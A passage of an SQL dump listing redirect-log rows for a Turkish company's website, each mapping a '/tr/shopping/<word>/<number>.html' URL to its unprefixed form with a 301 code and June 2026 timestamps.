00:00:00',301),(77234,'https://3s-technologies.com.tr/tr/shopping/balaklava/357888934.html',NULL,'https://3s-technologies.com.tr/shopping/balaklava/357888934.html','',1,0,'2026-06-11 09:46:52','0000-00-00 00:00:00',301),(77235,'https://3s-technologies.com.tr/tr/shopping/crosseye/2566221603.html',NULL,'https://3s-technologies.com.tr/shopping/crosseye/2566221603.html','',1,0,'2026-06-11 09:46:56','0000-00-00 00:00:00',301),(77236,'https://3s-technologies.com.tr/tr/shopping/coypus/919788592.html',NULL,'https://3s-technologies.com.tr/shopping/coypus/919788592.html','',1,0,'2026-06-11 09:46:59','0000-00-00 00:00:00',301),(77237,'https://3s-technologies.com.tr/tr/shopping/anthropography/3422661812.html',NULL,'https://3s-technologies.com.tr/shopping/anthropography/3422661812.html','',1,0,'2026-06-11 09:47:02','0000-00-00 00:00:00',301),(77238,'https://3s-technologies.com.tr/tr/shopping/obliterate/1548683793.html',NULL,'https://3s-technologies.com.tr/shopping/obliterate/1548683793.html','',1,0,'2026-06-11 09:47:05','0000-00-00 00:00:00',301),(77239,'https://3s-technologies.com.tr/tr/shopping/supracranial/3595117709.html',NULL,'https://3s-technologies.com.tr/shopping/supracranial/3595117709.html','',1,0,'2026-06-11 09:47:07','0000-00-00 00:00:00',301),(77240,'https://3s-technologies.com.tr/tr/shopping/stegocephala/3529991616.html',NULL,'https://3s-technologies.com.tr/shopping/stegocephala/3529991616.html','',1,0,'2026-06-11 09:47:11','0000-00-00 00:00:00',301),(77241,'https://3s-technologies.com.tr/tr/shopping/vorticellas/1348100933.html',NULL,'https://3s-technologies.com.tr/shopping/vorticellas/1348100933.html','',1,0,'2026-06-11 09:47:15','0000-00-00 00:00:00',301),(77242,'https://3s-technologies.com.tr/tr/shopping/metalmen/4004885011.html',NULL,'https://3s-technologies.com.tr/shopping/metalmen/4004885011.html','',1,0,'2026-06-11 09:47:18','0000-00-00 00:00:00',301),(77243,'https://3s-technologies.com.tr/tr/shopping/ogreish/2250512275.html',NULL,'https://3s-technologies.com.tr/shopping/ogreish/2250512275.html','',1,0,'2026-06-11 09:47:21','0000-00-00 00:00:00',301),(77244,'https://3s-technologies.com.tr/tr/shopping/nidorose/3151483746.html',NULL,'https://3s-technologies.com.tr/shopping/nidorose/3151483746.html','',1,0,'2026-06-11 09:47:24','0000-00-00 00:00:00',301),(77245,'https://3s-technologies.com.tr/tr/shopping/ambuscaded/3295369517.html',NULL,'https://3s-technologies.com.tr/shopping/ambuscaded/3295369517.html','',1,0,'2026-06-11 09:47:27','0000-00-00 00:00:00',301),(77246,'https://3s-technologies.com.tr/tr/shopping/neuroepidermal/2204220540.html',NULL,'https://3s-technologies.com.tr/shopping/neuroepidermal/2204220540.html','',1,0,'2026-06-11 09:47:30','0000-00-00 00:00:00',301),(77247,'https://3s-technologies.com.tr/tr/shopping/brontosaurus/2556287721.html',NULL,'https://3s-technologies.com.tr/shopping/brontosaurus/2556287721.html','',1,0,'2026-06-11 09:47:39','0000-00-00 00:00:00',301),(77248,'https://3s-technologies.com.tr/tr/shopping/athamanticum/1091320256.html',NULL,'https://3s-technologies.com.tr/shopping/athamanticum/1091320256.html','',1,0,'2026-06-11 09:47:42','0000-00-00 00:00:00',301),(77249,'https://3s-technologies.com.tr/tr/shopping/ungkapati/868683885.html',NULL,'https://3s-technologies.com.tr/shopping/ungkapati/868683885.html','',1,0,'2026-06-11 09:47:45','0000-00-00 00:00:00',301),(77250,'https://3s-technologies.com.tr/tr/shopping/cerealia/1894930921.html',NULL,'https://3s-technologies.com.tr/shopping/cerealia/1894930921.html','',1,0,'2026-06-11 09:47:48','0000-00-00 00:00:00',301),(77251,'https://3s-technologies.com.tr/tr/shopping/homeless/2923827026.html',NULL,'https://3s-technologies.com.tr/shopping/homeless/2923827026.html','',1,0,'2026-06-11 09:47:51','0000-00-00 00:00:00',301),(77252,'https://3s-technologies.com.tr/tr/shopping/myrmidon/3832556069.html',NULL,'https://3s-technologies.com.tr/shopping/myrmidon/3832556069.html','',1,0,'2026-06-11 09:47:54','0000-00-00 00:00:00',301),(77253,'https://3s-technologies.com.tr/tr/shopping/titanitic/536967649.html',NULL,'https://3s-technologies.com.tr/shopping/titanitic/536967649.html','',1,0,'2026-06-11 09:47:57','0000-00-00 00:00:00',301),(77254,'https://3s-technologies.com.tr/tr/shopping/megastome/845157861.html',NULL,'https://3s-technologies.com.tr/shopping/megastome/845157861.html','',1,0,'2026-06-11 09:48:00','0000-00-00 00:00:00',301),(77255,'https://3s-technologies.com.tr/tr/shopping/turbillion/717691328.html',NULL,'https://3s-technologies.com.tr/shopping/turbillion/717691328.html','',1,0,'2026-06-11 09:48:03','0000-00-00 00:00:00',301),(77256,'https://3s-technologies.com.tr/tr/shopping/pennat/3711193614.html',NULL,'https://3s-technologies.com.tr/shopping/pennat/3711193614.html','',1,0,'2026-06-11 09:48:06','0000-00-00 00:00:00',301),(77257,'https://3s-technologies.com.tr/tr/shopping/brimmed/2612518695.html',NULL,'https://3s-technologies.com.tr/shopping/brimmed/2612518695.html','',1,0,'2026-06-11 09:48:11','0000-00-00 00:00:00',301),(77258,'https://3s-technologies.com.tr/tr/shopping/irredentist/1709077208.html',NULL,'https://3s-technologies.com.tr/shopping/irredentist/1709077208.html','',1,0,'2026-06-11 09:48:12','0000-00-00 00:00:00',301),(77259,'https://3s-technologies.com.tr/tr/shopping/gaberdine/1991366680.html',NULL,'https://3s-technologies.com.tr/shopping/gaberdine/1991366680.html','',1,0,'2026-06-11 09:48:15','0000-00-00 00:00:00',301),(77260,'https://3s-technologies.com.tr/tr/shopping/bertholetia/874566051.html',NULL,'https://3s-technologies.com.tr/shopping/bertholetia/874566051.html','',1,0,'2026-06-11 09:48:18','0000-00-00 00:00:00',301),(77261,'https://3s-technologies.com.tr/tr/shopping/cordiner/3526614927.html',NULL,'https://3s-technologies.com.tr/shopping/cordiner/3526614927.html','',1,0,'2026-06-11 09:48:21','0000-00-00 00:00:00',301),(77262,'https://3s-technologies.com.tr/tr/shopping/criminous/3143354730.html',NULL,'https://3s-technologies.com.tr/shopping/criminous/3143354730.html','',1,0,'2026-06-11 09:48:24','0000-00-00 00:00:00',301),(77263,'https://3s-technologies.com.tr/tr/shopping/desalinate/3006153278.html',NULL,'https://3s-technologies.com.tr/shopping/desalinate/3006153278.html','',1,0,'2026-06-11 09:48:27','0000-00-00 00:00:00',301),(77264,'https://3s-technologies.com.tr/tr/shopping/permistion/2654667160.html',NULL,'https://3s-technologies.com.tr/shopping/permistion/2654667160.html','',1,0,'2026-06-11 09:48:31','0000-00-00 00:00:00',301),(77265,'https://3s-technologies.com.tr/tr/shopping/garrulax/876301821.html',NULL,'https://3s-technologies.com.tr/shopping/garrulax/876301821.html','',1,0,'2026-06-11 09:48:33','0000-00-00 00:00:00',301),(77266,'https://3s-technologies.com.tr/tr/shopping/metasilicic/519621981.html',NULL,'https://3s-technologies.com.tr/shopping/metasilicic/519621981.html','',1,0,'2026-06-11 09:48:38','0000-00-00 00:00:00',301),(77267,'https://3s-technologies.com.tr/tr/shopping/lacerated/1697510874.html',NULL,'https://3s-technologies.com.tr/shopping/lacerated/1697510874.html','',1,0,'2026-06-11 09:48:41','0000-00-00 00:00:00',301),(77268,'https://3s-technologies.com.tr/tr/shopping/jeremiad/126111793.html',NULL,'https://3s-technologies.com.tr/shopping/jeremiad/126111793.html','',1,0,'2026-06-11 09:48:44','0000-00-00 00:00:00',301),(77269,'https://3s-technologies.com.tr/tr/shopping/cartesion/3387430688.html',NULL,'https://3s-technologies.com.tr/shopping/cartesion/3387430688.html','',1,0,'2026-06-11 09:48:47','0000-00-00 00:00:00',301),(77270,'https://3s-technologies.com.tr/tr/shopping/ceraunian/1426065624.html',NULL,'https://3s-technologies.com.tr/shopping/ceraunian/1426065624.html','',1,0,'2026-06-11 09:48:50','0000-00-00 00:00:00',301),(77271,'https://3s-technologies.com.tr/tr/shopping/armamentary/2305069089.html',NULL,'https://3s-technologies.com.tr/shopping/armamentary/2305069089.html','',1,0,'2026-06-11 09:48:53','0000-00-00 00:00:00',301),(77272,'https://3s-technologies.com.tr/tr/shopping/ecdysiast/2325886186.html',NULL,'https://3s-technologies.com.tr/shopping/ecdysiast/2325886186.html','',1,0,'2026-06-11 09:48:56','0000-00-00 00:00:00',301),(77273,'https://3s-technologies.com.tr/tr/shopping/seaward/4285088850.html',NULL,'https://3s-technologies.com.tr/shopping/seaward/4285088850.html','',1,0,'2026-06-11 09:48:59','0000-00-00 00:00:00',301),(77274,'https://3s-technologies.com.tr/tr/shopping/carchariidae/3791094798.html',NULL,'https://3s-technologies.com.tr/shopping/carchariidae/3791094798.html','',1,0,'2026-06-11 09:49:02','0000-00-00 00:00:00',301),(77275,'https://3s-technologies.com.tr/tr/shopping/incoherentific/1011079075.html',NULL,'https://3s-technologies.com.tr/shopping/incoherentific/1011079075.html','',1,0,'2026-06-11 09:49:06','0000-00-00 00:00:00',301),(77276,'https://3s-technologies.com.tr/tr/shopping/leguleian/1196453073.html',NULL,'https://3s-technologies.com.tr/shopping/leguleian/1196453073.html','',1,0,'2026-06-11 09:49:08','0000-00-00 00:00:00',301),(77277,'https://3s-technologies.com.tr/tr/shopping/pronity/1515399984.html',NULL,'https://3s-technologies.com.tr/shopping/pronity/1515399984.html','',1,0,'2026-06-11 09:49:11','0000-00-00 00:00:00',301),(77278,'https://3s-technologies.com.tr/tr/shopping/paleichthyes/2834126657.html',NULL,'https://3s-technologies.com.tr/shopping/paleichthyes/2834126657.html','',1,0,'2026-06-11 09:49:14','0000-00-00 00:00:00',301),(77279,'https://3s-technologies.com.tr/tr/shopping/unagreeably/2857186513.html',NULL,'https://3s-technologies.com.tr/shopping/unagreeably/2857186513.html','',1,0,'2026-06-11 09:49:17','0000-00-00 00:00:00',301),(77280,'https://3s-technologies.com.tr/tr/shopping/kneeler/2443180335.html',NULL,'https://3s-technologies.com.tr/shopping/kneeler/2443180335.html','',1,0,'2026-06-11 09:49:20','0000-00-00 00:00:00',301),(77281,'https://3s-technologies.com.tr/tr/shopping/huroniroquous/3286660276.html',NULL,'https://3s-technologies.com.tr/shopping/huroniroquous/3286660276.html','',1,0,'2026-06-11 09:49:23','0000-00-00 00:00:00',301),(77282,'https://3s-technologies.com.tr/tr/shopping/eudromias/1079753922.html',NULL,'https://3s-technologies.com.tr/shopping/eudromias/1079753922.html','',1,0,'2026-06-11 09:49:26','0000-00-00 00:00:00',301),(77283,'https://3s-technologies.com.tr/tr/shopping/allegorize/2388623537.html',NULL,'https://3s-technologies.com.tr/shopping/allegorize/2388623537.html','',1,0,'2026-06-11 09:49:29','0000-00-00 00:00:00',301),(77284,'https://3s-technologies.com.tr/tr/shopping/mellitus/1795070319.html',NULL,'https://3s-technologies.com.tr/shopping/mellitus/1795070319.html','',1,0,'2026-06-11 09:49:33','0000-00-00 00:00:00',301),(77285,'https://3s-technologies.com.tr/tr/shopping/homage/1149632310.html',NULL,'https://3s-technologies.com.tr/shopping/homage/1149632310.html','',1,0,'2026-06-11 09:49:35','0000-00-00 00:00:00',301),(77286,'https://3s-technologies.com.tr/tr/shopping/disinthrall/702458135.html',NULL,'https://3s-technologies.com.tr/shopping/disinthrall/702458135.html','',1,0,'2026-06-11 09:49:38','0000-00-00 00:00:00',301),(77287,'https://3s-technologies.com.tr/tr/shopping/gardeni/1545307104.html',NULL,'https://3s-technologies.com.tr/shopping/gardeni/1545307104.html','',1,0,'2026-06-11 09:49:41','0000-00-00 00:00:00',301),(77288,'https://3s-technologies.com.tr/tr/shopping/anabolism/2889681338.html',NULL,'https://3s-technologies.com.tr/shopping/anabolism/2889681338.html','',1,0,'2026-06-11 09:49:44','0000-00-00 00:00:00',301),(77289,'https://3s-technologies.com.tr/tr/shopping/stipulaceous/3874951567.html',NULL,'https://3s-technologies.com.tr/shopping/stipulaceous/3874951567.html','',1,0,'2026-06-11 09:49:48','0000-00-00 00:00:00',301),(77290,'https://3s-technologies.com.tr/tr/shopping/songful/4268202131.html',NULL,'https://3s-technologies.com.tr/shopping/songful/4268202131.html','',1,0,'2026-06-11 09:49:50','0000-00-00 00:00:00',301),(77291,'https://3s-technologies.com.tr/tr/shopping/derogatoriness/1547731286.html',NULL,'https://3s-technologies.com.tr/shopping/derogatoriness/1547731286.html','',1,0,'2026-06-11 09:49:55','0000-00-00 00:00:00',301),(77292,'https://3s-technologies.com.tr/tr/shopping/sternwheeler/1793858220.html',NULL,'https://3s-technologies.com.tr/shopping/sternwheeler/1793858220.html','',1,0,'2026-06-11 09:49:59','0000-00-00 00:00:00',301),(77293,'https://3s-technologies.com.tr/tr/shopping/disesteemed/2194957578.html',NULL,'https://3s-technologies.com.tr/shopping/disesteemed/2194957578.html','',1,0,'2026-06-11 09:50:04','0000-00-00 00:00:00',301),(77294,'https://3s-technologies.com.tr/tr/shopping/ireland/1947819760.html',NULL,'https://3s-technologies.com.tr/shopping/ireland/1947819760.html','',1,0,'2026-06-11 09:50:06','0000-00-00 00:00:00',301),(77295,'https://3s-technologies.com.tr/tr/shopping/woodstone/3341141672.html',NULL,'https://3s-technologies.com.tr/shopping/woodstone/3341141672.html','',1,0,'2026-06-11 09:50:09','0000-00-00 00:00:00',301),(77296,'https://3s-technologies.com.tr/tr/shopping/sulpitian/638871946.html',NULL,'https://3s-technologies.com.tr/shopping/sulpitian/638871946.html','',1,0,'2026-06-11 09:50:12','0000-00-00 00:00:00',301),(77297,'https://3s-technologies.com.tr/tr/shopping/liquor/3476187953.html',NULL,'https://3s-technologies.com.tr/shopping/liquor/3476187953.html','',1,0,'2026-06-11 09:50:15','0000-00-00 00:00:00',301),(77298,'https://3s-technologies.com.tr/tr/shopping/ctenoidei/105823676.html',NULL,'https://3s-technologies.com.tr/shopping/ctenoidei/105823676.html','',1,0,'2026-06-11 09:50:18','0000-00-00 00:00:00',301),(77299,'https://3s-technologies.com.tr/tr/shopping/toluiferum/88468622.html',NULL,'https://3s-technologies.com.tr/shopping/toluiferum/88468622.html','',1,0,'2026-06-11 09:50:21','0000-00-00 00:00:00',301),(77300,'https://3s-technologies.com.tr/tr/shopping/aporias/648064876.html',NULL,'https://3s-technologies.com.tr/shopping/aporias/648064876.html','',1,0,'2026-06-11 09:50:24','0000-00-00 00:00:00',301),(77301,'https://3s-technologies.com.tr/tr/shopping/blackwash/1587539047.html',NULL,'https://3s-technologies.com.tr/shopping/blackwash/1587539047.html','',1,0,'2026-06-11 09:50:27','0000-00-00 00:00:00',301),(77302,'https://3s-technologies.com.tr/tr/shopping/lozengemolding/843806964.html',NULL,'https://3s-technologies.com.tr/shopping/lozengemolding/843806964.html','',1,0,'2026-06-11 09:50:33','0000-00-00 00:00:00',301),(77303,'https://3s-technologies.com.tr/tr/shopping/pirouetted/3209263678.html',NULL,'https://3s-technologies.com.tr/shopping/pirouetted/3209263678.html','',1,0,'2026-06-11 09:50:35','0000-00-00 00:00:00',301),(77304,'https://3s-technologies.com.tr/tr/shopping/lawsonia/712159436.html',NULL,'https://3s-technologies.com.tr/shopping/lawsonia/712159436.html','',1,0,'2026-06-11 09:50:38','0000-00-00 00:00:00',301),(77305,'https://3s-technologies.com.tr/tr/shopping/toreumatology/607569937.html',NULL,'https://3s-technologies.com.tr/shopping/toreumatology/607569937.html','',1,0,'2026-06-11 09:50:41','0000-00-00 00:00:00',301),(77306,'https://3s-technologies.com.tr/tr/shopping/hyppogriff/2350456695.html',NULL,'https://3s-technologies.com.tr/shopping/hyppogriff/2350456695.html','',1,0,'2026-06-11 09:50:44','0000-00-00 00:00:00',301),(77307,'https://3s-technologies.com.tr/tr/shopping/spartium/1346888850.html',NULL,'https://3s-technologies.com.tr/shopping/spartium/1346888850.html','',1,0,'2026-06-11 09:50:47','0000-00-00 00:00:00',301),(77308,'https://3s-technologies.com.tr/tr/shopping/notopodium/2594671860.html',NULL,'https://3s-technologies.com.tr/shopping/notopodium/2594671860.html','',1,0,'2026-06-11 09:50:50','0000-00-00 00:00:00',301),(77309,'https://3s-technologies.com.tr/tr/shopping/threepence/2349931790.html',NULL,'https://3s-technologies.com.tr/shopping/threepence/2349931790.html','',1,0,'2026-06-11 09:50:53','0000-00-00 00:00:00',301),(77310,'https://3s-technologies.com.tr/tr/shopping/lifesizedlimacfsimacz/2836454770.html',NULL,'https://3s-technologies.com.tr/shopping/lifesizedlimacfsimacz/2836454770.html','',1,0,'2026-06-11 09:50:56','0000-00-00 00:00:00',301),(77311,'https://3s-technologies.com.tr/tr/shopping/meresman/2926112410.html',NULL,'https://3s-technologies.com.tr/shopping/meresman/2926112410.html','',1,0,'2026-06-11 09:51:00','0000-00-00 00:00:00',301),(77312,'https://3s-technologies.com.tr/tr/shopping/passibleness/1177540578.html',NULL,'https://3s-technologies.com.tr/shopping/passibleness/1177540578.html','',1,0,'2026-06-11 09:51:02','0000-00-00 00:00:00',301),(77313,'https://3s-technologies.com.tr/tr/shopping/diluviums/1511859772.html',NULL,'https://3s-technologies.com.tr/shopping/diluviums/1511859772.html','',1,0,'2026-06-11 09:51:06','0000-00-00 00:00:00',301),(77314,'https://3s-technologies.com.tr/tr/shopping/nycticorax/105987199.html',NULL,'https://3s-technologies.com.tr/shopping/nycticorax/105987199.html','',1,0,'2026-06-11 09:51:08','0000-00-00 00:00:00',301),(77315,'https://3s-technologies.com.tr/tr/shopping/cranesbill/3996617229.html',NULL,'https://3s-technologies.com.tr/shopping/cranesbill/3996617229.html','',1,0,'2026-06-11 09:51:11','0000-00-00 00:00:00',301),(77316,'https://3s-technologies.com.tr/tr/shopping/pulcherrima/3213233150.html',NULL,'https://3s-technologies.com.tr/shopping/pulcherrima/3213233150.html','',1,0,'2026-06-11 09:51:15','0000-00-00 00:00:00',301),(77317,'https://3s-technologies.com.tr/tr/shopping/discordantness/1375263238.html',NULL,'https://3s-technologies.com.tr/shopping/discordantness/1375263238.html','',1,0,'2026-06-11 09:51:17','0000-00-00 00:00:00',301),(77318,'https://3s-technologies.com.tr/tr/shopping/liopelma/2569598292.html',NULL,'https://3s-technologies.com.tr/shopping/liopelma/2569598292.html','',1,0,'2026-06-11 09:51:20','0000-00-00 00:00:00',301),(77319,'https://3s-technologies.com.tr/tr/shopping/crustalogist/353136639.html',NULL,'https://3s-technologies.com.tr/shopping/crustalogist/353136639.html','',1,0,'2026-06-11 09:51:23','0000-00-00 00:00:00',301),(77320,'https://3s-technologies.com.tr/tr/shopping/ianthina/1619407385.html',NULL,'https://3s-technologies.com.tr/shopping/ianthina/1619407385.html','',1,0,'2026-06-11 09:51:28','0000-00-00 00:00:00',301),(77321,'https://3s-technologies.com.tr/tr/shopping/hazeless/3718007621.html',NULL,'https://3s-technologies.com.tr/shopping/hazeless/3718007621.html','',1,0,'2026-06-11 09:51:31','0000-00-00 00:00:00',301),(77322,'https://3s-technologies.com.tr/tr/shopping/afforciament/2550486850.html',NULL,'https://3s-technologies.com.tr/shopping/afforciament/2550486850.html','',1,0,'2026-06-11 09:51:34','0000-00-00 00:00:00',301),(77323,'https://3s-technologies.com.tr/tr/shopping/displeasantness/3498113876.html',NULL,'https://3s-technologies.com.tr/shopping/displeasantness/3498113876.html','',1,0,'2026-06-11 09:51:37','0000-00-00 00:00:00',301),(77324,'https://3s-technologies.com.tr/tr/shopping/intrinsicality/4145463184.html',NULL,'https://3s-technologies.com.tr/shopping/intrinsicality/4145463184.html','',1,0,'2026-06-11 09:51:40','0000-00-00 00:00:00',301),(77325,'https://3s-technologies.com.tr/tr/shopping/majorleague/1495716817.html',NULL,'https://3s-technologies.com.tr/shopping/majorleague/1495716817.html','',1,0,'2026-06-11 09:51:43','0000-00-00 00:00:00',301),(77326,'https://3s-technologies.com.tr/tr/shopping/sphondylium/2807962251.html',NULL,'https://3s-technologies.com.tr/shopping/sphondylium/2807962251.html','',1,0,'2026-06-11 09:51:46','0000-00-00 00:00:00',301),(77327,'https://3s-technologies.com.tr/tr/shopping/knotted/2608453562.html',NULL,'https://3s-technologies.com.tr/shopping/knotted/2608453562.html','',1,0,'2026-06-11 09:51:49','0000-00-00 00:00:00',301),(77328,'https://3s-technologies.com.tr/tr/shopping/unmatched/1130114881.html',NULL,'https://3s-technologies.com.tr/shopping/unmatched/1130114881.html','',1,0,'2026-06-11 09:51:52','0000-00-00 00:00:00',301),(77329,'https://3s-technologies.com.tr/tr/shopping/puppying/1251919341.html',NULL,'https://3s-technologies.com.tr/shopping/puppying/1251919341.html','',1,0,'2026-06-11 09:52:18','0000-00-00 00:00:00',301),(77330,'https://3s-technologies.com.tr/tr/shopping/cracidae/4227850081.html',NULL,'https://3s-technologies.com.tr/shopping/cracidae/4227850081.html','',1,0,'2026-06-11 09:52:20','0000-00-00 00:00:00',301),(77331,'https://3s-technologies.com.tr/tr/shopping/daphnia/2710036797.html',NULL,'https://3s-technologies.com.tr/shopping/daphnia/2710036797.html','',1,0,'2026-06-11 09:52:23','0000-00-00 00:00:00',301),(77332,'https://3s-technologies.com.tr/tr/shopping/megapodidae/1999392818.html',NULL,'https://3s-technologies.com.tr/shopping/megapodidae/1999392818.html','',1,0,'2026-06-11 09:52:26','0000-00-00 00:00:00',301),(77333,'https://3s-technologies.com.tr/tr/shopping/agapornis/3268760917.html',NULL,'https://3s-technologies.com.tr/shopping/agapornis/3268760917.html','',1,0,'2026-06-11 09:52:29','0000-00-00 00:00:00',301),(77334,'https://3s-technologies.com.tr/tr/shopping/gynecocracy/2133156936.html',NULL,'https://3s-technologies.com.tr/shopping/gynecocracy/2133156936.html','',1,0,'2026-06-11 09:52:32','0000-00-00 00:00:00',301),(77335,'https://3s-technologies.com.tr/tr/shopping/amphibium/1336861562.html',NULL,'https://3s-technologies.com.tr/shopping/amphibium/1336861562.html','',1,0,'2026-06-11 09:52:35','0000-00-00 00:00:00',301),(77336,'https://3s-technologies.com.tr/tr/shopping/malleate/708994270.html',NULL,'https://3s-technologies.com.tr/shopping/malleate/708994270.html','',1,0,'2026-06-11 09:52:38','0000-00-00 00:00:00',301),(77337,'https://3s-technologies.com.tr/tr/shopping/sicklewort/1363164782.html',NULL,'https://3s-technologies.com.tr/shopping/sicklewort/1363164782.html','',1,0,'2026-06-11 09:52:41','0000-00-00 00:00:00',301),(77338,'https://3s-technologies.com.tr/tr/shopping/quenouille/2471053147.html',NULL,'https://3s-technologies.com.tr/shopping/quenouille/2471053147.html','',1,0,'2026-06-11 09:52:49','0000-00-00 00:00:00',301),(77339,'https://3s-technologies.com.tr/tr/shopping/spectroheliographic/296777620.html',NULL,'https://3s-technologies.com.tr/shopping/spectroheliographic/296777620.html','',1,0,'2026-06-11 09:52:53','0000-00-00 00:00:00',301),(77340,'https://3s-technologies.com.tr/tr/shopping/dilaniation/365443925.html',NULL,'https://3s-technologies.com.tr/shopping/dilaniation/365443925.html','',1,0,'2026-06-11 09:52:57','0000-00-00 00:00:00',301),(77341,'https://3s-technologies.com.tr/tr/shopping/uvedalia/2602489168.html',NULL,'https://3s-technologies.com.tr/shopping/uvedalia/2602489168.html','',1,0,'2026-06-11 09:53:00','0000-00-00 00:00:00',301),(77342,'https://3s-technologies.com.tr/tr/shopping/pulmoniferous/2510464873.html',NULL,'https://3s-technologies.com.tr/shopping/pulmoniferous/2510464873.html','',1,0,'2026-06-11 09:53:02','0000-00-00 00:00:00',301),(77343,'https://3s-technologies.com.tr/tr/shopping/cestraciont/183863445.html',NULL,'https://3s-technologies.com.tr/shopping/cestraciont/183863445.html','',1,0,'2026-06-11 09:53:06','0000-00-00 00:00:00',301),(77344,'https://3s-technologies.com.tr/tr/shopping/melancholily/143222067.html',NULL,'https://3s-technologies.com.tr/shopping/melancholily/143222067.html','',1,0,'2026-06-11 09:53:08','0000-00-00 00:00:00',301),(77345,'https://3s-technologies.com.tr/tr/shopping/zythepsary/841642374.html',NULL,'https://3s-technologies.com.tr/shopping/zythepsary/841642374.html','',1,0,'2026-06-11 09:53:12','0000-00-00 00:00:00',301),(77346,'https://3s-technologies.com.tr/tr/shopping/ruridecanal/792279330.html',NULL,'https://3s-technologies.com.tr/shopping/ruridecanal/792279330.html','',1,0,'2026-06-11 09:53:14','0000-00-00 00:00:00',301),(77347,'https://3s-technologies.com.tr/tr/shopping/tetryl/1565431698.html',NULL,'https://3s-technologies.com.tr/shopping/tetryl/1565431698.html','',1,0,'2026-06-11 09:53:22','0000-00-00 00:00:00',301),(77348,'https://3s-technologies.com.tr/tr/shopping/caricaceae/1623472518.html',NULL,'https://3s-technologies.com.tr/shopping/caricaceae/1623472518.html','',1,0,'2026-06-11 09:53:26','0000-00-00 00:00:00',301),(77349,'https://3s-technologies.com.tr/tr/shopping/household/3036223921.html',NULL,'https://3s-technologies.com.tr/shopping/household/3036223921.html','',1,0,'2026-06-11 09:53:29','0000-00-00 00:00:00',301),(77350,'https://3s-technologies.com.tr/tr/shopping/vitamin/3951416767.html',NULL,'https://3s-technologies.com.tr/shopping/vitamin/3951416767.html','',1,0,'2026-06-11 09:53:32','0000-00-00 00:00:00',301),(77351,'https://3s-technologies.com.tr/tr/shopping/trikosane/262508955.html',NULL,'https://3s-technologies.com.tr/shopping/trikosane/262508955.html','',1,0,'2026-06-11 09:53:35','0000-00-00 00:00:00',301),(77352,'https://3s-technologies.com.tr/tr/shopping/hoheria/3024125433.html',NULL,'https://3s-technologies.com.tr/shopping/hoheria/3024125433.html','',1,0,'2026-06-11 09:53:38','0000-00-00 00:00:00',301),(77353,'https://3s-technologies.com.tr/tr/shopping/unearthly/619659910.html',NULL,'https://3s-technologies.com.tr/shopping/unearthly/619659910.html','',1,0,'2026-06-11 09:53:41','0000-00-00 00:00:00',301),(77354,'https://3s-technologies.com.tr/tr/shopping/chandlery/2131944837.html',NULL,'https://3s-technologies.com.tr/shopping/chandlery/2131944837.html','',1,0,'2026-06-11 09:53:44','0000-00-00 00:00:00',301),(77355,'https://3s-technologies.com.tr/tr/shopping/orchestia/3815427382.html',NULL,'https://3s-technologies.com.tr/shopping/orchestia/3815427382.html','',1,0,'2026-06-11 09:53:47','0000-00-00 00:00:00',301),(77356,'https://3s-technologies.com.tr/tr/shopping/metaarabinic/2637148583.html',NULL,'https://3s-technologies.com.tr/shopping/metaarabinic/2637148583.html','',1,0,'2026-06-11 09:53:53','0000-00-00 00:00:00',301),(77357,'https://3s-technologies.com.tr/tr/shopping/ascititious/1732729847.html',NULL,'https://3s-technologies.com.tr/shopping/ascititious/1732729847.html','',1,0,'2026-06-11 09:53:56','0000-00-00 00:00:00',301),(77358,'https://3s-technologies.com.tr/tr/shopping/scutibranchia/610421689.html',NULL,'https://3s-technologies.com.tr/shopping/scutibranchia/610421689.html','',1,0,'2026-06-11 09:53:59','0000-00-00 00:00:00',301),(77359,'https://3s-technologies.com.tr/tr/shopping/fatkidneyed/2063278532.html',NULL,'https://3s-technologies.com.tr/shopping/fatkidneyed/2063278532.html','',1,0,'2026-06-11 09:54:02','0000-00-00 00:00:00',301),(77360,'https://3s-technologies.com.tr/tr/shopping/forlornness/2847068597.html',NULL,'https://3s-technologies.com.tr/shopping/forlornness/2847068597.html','',1,0,'2026-06-11 09:54:05','0000-00-00 00:00:00',301),(77361,'https://3s-technologies.com.tr/tr/shopping/czechoslovakian/804586616.html',NULL,'https://3s-technologies.com.tr/shopping/czechoslovakian/804586616.html','',1,0,'2026-06-11 09:54:08','0000-00-00 00:00:00',301),(77362,'https://3s-technologies.com.tr/tr/shopping/nibelung/2963921303.html',NULL,'https://3s-technologies.com.tr/shopping/nibelung/2963921303.html','',1,0,'2026-06-11 09:54:11','0000-00-00 00:00:00',301),(77363,'https://3s-technologies.com.tr/tr/shopping/oviferous/2592247678.html',NULL,'https://3s-technologies.com.tr/shopping/oviferous/2592247678.html','',1,0,'2026-06-11 09:54:14','0000-00-00 00:00:00',301),(77364,'https://3s-technologies.com.tr/tr/shopping/carduelis/1214198017.html',NULL,'https://3s-technologies.com.tr/shopping/carduelis/1214198017.html','',1,0,'2026-06-11 09:54:17','0000-00-00 00:00:00',301),(77365,'https://3s-technologies.com.tr/tr/shopping/spewing/2095574410.html',NULL,'https://3s-technologies.com.tr/shopping/spewing/2095574410.html','',1,0,'2026-06-11 09:54:24','0000-00-00 00:00:00',301),(77366,'https://3s-technologies.com.tr/tr/shopping/demandable/2142680392.html',NULL,'https://3s-technologies.com.tr/shopping/demandable/2142680392.html','',1,0,'2026-06-11 09:54:28','0000-00-00 00:00:00',301),(77367,'https://3s-technologies.com.tr/tr/shopping/overall/3733102016.html',NULL,'https://3s-technologies.com.tr/shopping/overall/3733102016.html','',1,0,'2026-06-11 09:54:31','0000-00-00 00:00:00',301),(77368,'https://3s-technologies.com.tr/tr/shopping/tagger/1976195050.html',NULL,'https://3s-technologies.com.tr/shopping/tagger/1976195050.html','',1,0,'2026-06-11 09:54:34','0000-00-00 00:00:00',301),(77369,'https://3s-technologies.com.tr/tr/shopping/hypostatically/2975609349.html',NULL,'https://3s-technologies.com.tr/shopping/hypostatically/2975609349.html','',1,0,'2026-06-11 09:54:37','0000-00-00 00:00:00',301),(77370,'https://3s-technologies.com.tr/tr/shopping/gnashed/3616025126.html',NULL,'https://3s-technologies.com.tr/shopping/gnashed/3616025126.html','',1,0,'2026-06-11 09:54:40','0000-00-00 00:00:00',301),(77371,'https://3s-technologies.com.tr/tr/shopping/mindaltering/1991263802.html',NULL,'https://3s-technologies.com.tr/shopping/mindaltering/1991263802.html','',1,0,'2026-06-11 09:54:43','0000-00-00 00:00:00',301),(77372,'https://3s-technologies.com.tr/tr/shopping/adjutor/2353369108.html',NULL,'https://3s-technologies.com.tr/shopping/adjutor/2353369108.html','',1,0,'2026-06-11 09:54:46','0000-00-00 